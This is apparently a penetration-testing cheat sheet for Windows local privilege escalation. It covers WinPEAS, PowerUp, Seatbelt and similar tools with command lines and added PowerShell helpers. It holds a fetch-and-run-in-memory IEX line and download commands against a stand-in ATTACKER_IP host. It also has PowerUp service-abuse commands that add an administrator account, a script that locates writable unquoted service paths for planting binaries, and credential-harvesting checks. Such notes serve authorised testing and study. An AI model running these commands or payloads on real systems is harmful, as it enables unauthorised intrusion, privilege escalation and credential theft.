
WinPEAS

Part of PEASS-ng; the most comprehensive general-purpose local enumeration tool for Windows. The .exe build needs a .NET Framework runtime on the target; the .bat build is a plain batch script for hosts without one. Both are widely signatured, so expect stock Defender to quarantine an unmodified copy.

Download

https://github.com/peass-ng/PEASS-ng/releases

# .exe (recommended; needs .NET Framework on the target)
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASx64.exe -o winPEASx64.exe

# .bat (no .NET required; fewer checks than the .exe)
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEAS.bat -o winPEAS.bat

Transfer to Target

Host the file on the attacker machine first (any HTTP server will do). iwr is the PowerShell alias of Invoke-WebRequest; certutil works from a plain cmd.exe shell. Both write the binary to disk in the current directory.

# PowerShell
iwr http://ATTACKER_IP/winPEASx64.exe -OutFile winPEAS.exe
# cmd.exe
certutil -urlcache -f http://ATTACKER_IP/winPEASx64.exe winPEAS.exe

Run

Run it from cmd.exe or PowerShell. If the colours do not render, set the REG_DWORD value VirtualTerminalLevel to 1 under HKCU\Console and open a new console (the PEASS-ng README documents this), or pass the notcolor argument.

winPEAS.exe

Specific Checks

Arguments are plain words with no dashes. quiet only suppresses the banner, so combine it with a section name to limit which checks run.

winPEAS.exe quiet                  # Hide the banner
winPEAS.exe quiet systeminfo       # System info only
winPEAS.exe quiet servicesinfo     # Services only
winPEAS.exe quiet userinfo         # User info only
winPEAS.exe quiet networkinfo      # Network only
winPEAS.exe quiet applicationsinfo # Applications
winPEAS.exe quiet windowscreds     # Windows credentials
winPEAS.exe quiet browserinfo      # Browser data
winPEAS.exe quiet filesinfo        # Interesting files

Save Output

Redirection keeps the ANSI colour escape sequences in the file. Add the notcolor argument if you want plain text, or keep them and use the colours to triage the file later.

winPEAS.exe > winpeas_output.txt

Color Legend

Color    Meaning
-----    -------
Red      95% privesc vector
Yellow   High probability
Green    Useful info
Cyan     Informational
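Triage of a saved winPEAS log by colour, as an added example (PowerShell written for this page, not part of PEASS-ng). It assumes winPEAS emits standard ANSI SGR sequences whose colour codes 31, 33, 32 and 36 correspond to the legend rows above; the sample lines are constructed for the demo and are not verbatim winPEAS output.

```powershell
# Added example, not PEASS-ng code. Assumption: winPEAS colours are standard
# ANSI SGR codes (31 red, 33 yellow, 32 green, 36 cyan), matching the legend.
$ColourCategory = @{ '31' = 'Red'; '33' = 'Yellow'; '32' = 'Green'; '36' = 'Cyan' }
$Severity       = 'Red', 'Yellow', 'Green', 'Cyan'   # most to least interesting

function Get-WinPeasFindings {
    param([string[]]$Lines = @())
    $sgr = [regex]'\x1b\[([0-9;]*)m'               # ESC [ params m
    foreach ($line in $Lines) {
        # Collect every colour code used on the line (e.g. "1;31" -> 1, 31)
        $cats = @()
        foreach ($m in $sgr.Matches($line)) {
            foreach ($code in ($m.Groups[1].Value -split ';')) {
                if ($ColourCategory.ContainsKey($code)) { $cats += $ColourCategory[$code] }
            }
        }
        # Rank the line by the most interesting colour present
        $top = 'None'
        foreach ($s in $Severity) { if ($cats -contains $s) { $top = $s; break } }
        $clean = $sgr.Replace($line, '').Trim()      # plain text, escapes removed
        if (-not $clean) { continue }
        [pscustomobject]@{ Category = $top; Text = $clean }
    }
}

# Constructed sample lines (shape only; not verbatim winPEAS output)
$esc = [char]27
$sample = @(
    "${esc}[1;36m[+] ${esc}[1;37mServices Information${esc}[0m",
    "  ${esc}[1;31mC:\Program Files\Vuln App\bin\svc.exe${esc}[0m (Unquoted and Space detected)",
    "  ${esc}[1;33mSeImpersonatePrivilege${esc}[0m: SE_PRIVILEGE_ENABLED",
    "  ${esc}[1;32mAutomatic Updates enabled${esc}[0m"
)
Get-WinPeasFindings -Lines $sample |
    Where-Object { $_.Category -in 'Red', 'Yellow' } |
    Format-Table -AutoSize

# Against a real capture from the Save Output step:
# Get-WinPeasFindings -Lines (Get-Content .\winpeas_output.txt) | Group-Object Category
```

Against a real capture, pipe the result to Group-Object Category to see how many red and yellow items you have before reading the whole file; lines that carry no colour code come out as None.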

PowerUp (PowerShell)

Part of PowerSploit's Privesc module (PowerSploit itself is no longer maintained). Checks common misconfigurations (service permissions, unquoted service paths, AlwaysInstallElevated, autologon credentials, modifiable paths) and can exploit several of them directly. It is heavily signatured: expect AMSI to block it on a patched host unless AMSI is bypassed.

Download

https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1

Load

Scripts on disk need an execution policy that allows them (start PowerShell with -ep bypass). The in-memory variant never touches disk but is still scanned by AMSI and captured by script block logging.

. .\PowerUp.ps1                                                                  # dot-source from disk
IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/PowerUp.ps1')   # fetch and run in memory

Run All Checks

Invoke-AllChecks    # alias of Invoke-PrivescAudit in current PowerUp; either name works

Specific Checks

Get-UnquotedService               # unquoted service binary paths containing spaces
Get-ModifiableService             # services whose configuration the current user can change
Get-ModifiableServiceFile         # services whose binary (or its directory) is writable
Get-ServiceUnquoted               # older name, alias of Get-UnquotedService
Get-RegistryAlwaysInstallElevated # AlwaysInstallElevated set in both HKLM and HKCU
Get-RegistryAutoLogon             # cleartext autologon credentials under Winlogon
Get-ModifiablePath                # helper: parts of a path string the current user can modify
Get-CurrentUserTokenGroupSid      # group SIDs of the current process token

Auto-exploit

Invoke-ServiceAbuse targets a service reported by Get-ModifiableService: it rewrites the binary path, restarts the service and then restores the original configuration. By default it creates the local user john with password Password123! and adds it to Administrators; -Command runs an arbitrary command instead. Write-ServiceBinary only writes a service executable (same default user-add payload) to -Path; you then place it on the hijacked unquoted path yourself, or use Install-ServiceBinary for a Get-ModifiableServiceFile finding. Both are noisy (new local user, service restart) and leave artifacts to clean up.

Invoke-ServiceAbuse -Name 'VulnService'
Write-ServiceBinary -Name 'VulnService' -Path C:\Windows\Temp\shell.exe
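Before handing a service to Invoke-ServiceAbuse or planting a Write-ServiceBinary payload, it helps to see what the unquoted-path check actually does. The following is an added example written for this page (not PowerUp's code): it reproduces the logic behind Get-UnquotedService and adds an empirical writability probe. The sample PathName is constructed; Find-UnquotedServicePath queries the live Win32_Service class and only makes sense on Windows.

```powershell
# Added example, not PowerUp code. Reproduces the unquoted-service-path check
# and tests each hijack point for writability by actually writing a probe file.

function Get-UnquotedPathCandidates {
    # For an unquoted ImagePath containing spaces, return the file names the
    # service control manager tries before the real one, e.g.
    # 'C:\Program Files\Vuln App\bin\svc.exe -run' -> C:\Program.exe and
    # 'C:\Program Files\Vuln.exe'. A binary planted at any of them runs instead.
    param([string]$PathName)
    if (-not $PathName -or $PathName.StartsWith('"')) { return @() }   # quoted: safe
    $i = $PathName.IndexOf('.exe', [System.StringComparison]::OrdinalIgnoreCase)
    if ($i -lt 0) { return @() }
    $exe = $PathName.Substring(0, $i + 4)            # drop trailing arguments
    if ($exe -notmatch ' ') { return @() }           # no space: nothing to hijack
    $tokens = $exe -split ' '
    $out = @()
    for ($n = 1; $n -lt $tokens.Count; $n++) {
        $out += (($tokens[0..($n - 1)] -join ' ') + '.exe')
    }
    return $out
}

function Test-DirectoryWritable {
    # Empirical test: create and delete a probe file. Simpler and more reliable
    # than parsing ACLs (which is what PowerUp does), but it touches disk.
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return $false }
    $probe = Join-Path $Path ([System.IO.Path]::GetRandomFileName())
    try {
        [System.IO.File]::WriteAllText($probe, '')
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch { return $false }
}

function Find-UnquotedServicePath {
    # Live check: every service whose unquoted path has a writable hijack point.
    foreach ($svc in (Get-CimInstance -ClassName Win32_Service)) {
        foreach ($cand in (Get-UnquotedPathCandidates -PathName $svc.PathName)) {
            $dir = Split-Path -Parent $cand
            if (Test-DirectoryWritable -Path $dir) {
                [pscustomobject]@{
                    Service   = $svc.Name
                    RunsAs    = $svc.StartName     # LocalSystem is the prize
                    StartMode = $svc.StartMode     # Auto: fires on reboot if you cannot restart it
                    PlantAt   = $cand              # where to drop the Write-ServiceBinary output
                }
            }
        }
    }
}

# Offline demo on a constructed path (prints C:\Program.exe and C:\Program Files\Vuln.exe):
Get-UnquotedPathCandidates -PathName 'C:\Program Files\Vuln App\bin\svc.exe -run'

# Live, Windows only:
# Find-UnquotedServicePath | Format-Table -AutoSize
```

A writable hijack point is only useful if you can also get the service to restart (stop/start rights on it, or an Auto-start service plus a reboot) and the service runs as a more privileged account than you; Invoke-ServiceAbuse handles the restart for modifiable services, but for an unquoted path you restart it yourself. Test-DirectoryWritable creates and removes a probe file, which is a disk artifact to keep in mind on engagements that care about forensics.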

Seatbelt (.NET)

GhostPack's security-focused host survey: very detailed, read-only, no auto-exploit. GhostPack publishes no release binaries, so compile it from source (or use a prebuilt copy you trust). Results are filtered to the interesting ones by default; -full disables that filtering and -outputfile="C:\path\out.txt" writes them to a file.
https://github.com/GhostPack/Seatbelt

Run All Checks

Seatbelt.exe -group=all          # every check; slow and noisy, add -full for unfiltered output

Specific Groups

Seatbelt.exe -group=system       # System info
Seatbelt.exe -group=user         # User info
Seatbelt.exe -group=misc         # Misc checks
Seatbelt.exe -group=chrome       # Chrome data

Individual Commands

Seatbelt.exe TokenPrivileges     # privileges on the current token (SeImpersonate etc.)
Seatbelt.exe InterestingFiles    # "interesting" files in user home directories
Seatbelt.exe CredEnum            # Credential Manager entries
Seatbelt.exe WindowsVault        # Windows Vault entries
Seatbelt.exe DpapiMasterKeys     # DPAPI master key files per user

SharpUp (.NET)

GhostPack's C# port of PowerUp's checks; enumeration only, no exploitation functions. audit runs every check regardless of whether the current user is already elevated; a check name on its own runs just that check.
https://github.com/GhostPack/SharpUp
SharpUp.exe audit

PrivescCheck (PowerShell)

Actively maintained PowerShell alternative to PowerUp; read-only, no exploitation. -Extended adds the slower, more verbose checks; -Report gives the base name of the output file(s) and -Format the type(s).
https://github.com/itm4n/PrivescCheck
. .\PrivescCheck.ps1
Invoke-PrivescCheck
Invoke-PrivescCheck -Extended    # More checks
Invoke-PrivescCheck -Report PrivescCheck_report -Format HTML   # writes PrivescCheck_report.html

JAWS (PowerShell)

Lightweight single script with no dependencies; runs on PowerShell 2.0 and later, so it works on old hosts where the others fail. Dot-sourcing runs it immediately; -OutputFilename writes the report to a file instead of the console.
https://github.com/411Hall/JAWS
. .\jaws-enum.ps1

Quick Decision

Scenario                          Tool
--------                          ----
Full enumeration, .NET available  WinPEAS.exe
No .NET                           winPEAS.bat or JAWS
PowerShell available              PowerUp or PrivescCheck
Need auto-exploit                 PowerUp (Invoke-ServiceAbuse)
Security audit detail             Seatbelt
No file on disk                   IEX download + PowerUp (still visible to AMSI and script block logging; not stealth against EDR)